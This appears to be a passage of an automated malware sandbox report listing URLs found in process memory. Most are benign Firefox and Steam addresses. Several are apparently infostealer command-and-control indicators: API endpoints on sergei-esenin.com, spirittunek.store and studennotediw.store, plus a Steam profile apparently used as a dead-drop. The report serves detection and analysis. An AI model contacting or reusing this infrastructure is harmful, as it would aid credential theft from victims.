Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comto-handle-default-browser-agentdevtools-commandkey-storageFound
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848249080.000002EE4C96B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001A.00000003.2681144026.000002EE5CB10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C999000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2680534458.000002EE5C900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2876295890.000002EE5CE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000003.2683845506.000002EE5CB32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C9B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/google-analytics-legacy.jsshims/mochitest-shim-3.js
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/google-analytics-legacy.jsshims/mochitest-shim-3.jsWeb
Source: file.exe, file.exe, 00000000.00000003.2214088473.000000000559E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246657892.0000000005596000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202163946.00000000055A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246625273.0000000005593000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2258900362.0000000005594000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214122871.00000000055AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api
Source: file.exe, 00000000.00000003.2202163946.00000000055A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiWD
Source: file.exe, 00000000.00000003.2214088473.000000000559E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214122871.00000000055AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiw/yp
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001A.00000002.2905856189.000002EE5EF42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2917093566.000002EE60467000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E95F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64A9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C9E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2873106166.000002EE5C9E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svghttps://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spirittunek.store:443/api
Source: firefox.exe, 0000001A.00000002.2913537647.000002EE6005C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64A53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64A53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001A.00000003.2784527103.000002EE6511D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2891757977.000002EE5DD26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2939387090.000002EE67103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64A53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2848249080.000002EE4C9D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2784801311.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2929744715.000002EE64DD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2752233467.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2783622584.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2872614032.000002EE5C848000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2927621655.000002EE64B60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E91B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E910000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2900792770.000002EE5EA4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E96C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E910000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E90C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2897777583.000002EE5E77B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2855339754.000002EE58F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E908000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2900792770.000002EE5EA4D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2897777583.000002EE5E7FD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.000000000179D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.00000000017B8000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: aae25c676b.exe, 00000015.00000003.2713381738.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/-
Source: aae25c676b.exe, 00000009.00000002.2562909135.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.000000000179D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: aae25c676b.exe, 00000009.00000002.2562796785.0000000000C16000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.00000000017B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900;
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: aae25c676b.exe, 00000009.00000003.2562081008.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000002.2562909135.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562260264.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000002.2562821885.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C49000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2713381738.00000000017EB000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2731829717.00000000017EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: aae25c676b.exe, 00000009.00000003.2562081008.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562260264.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000002.2562821885.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cb9e7f3651c38ac4
Source: aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.000000000179D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.2177063879.0000000001000000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562025854.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000003.2711982095.000000000181E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/apiz=
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-user-removal
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001A.00000002.2862601112.000002EE5A160000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2936846123.000002EE653E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2869831146.000002EE5C414000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: file.exe, 00000000.00000003.2215827010.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2926686487.000002EE64ABF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
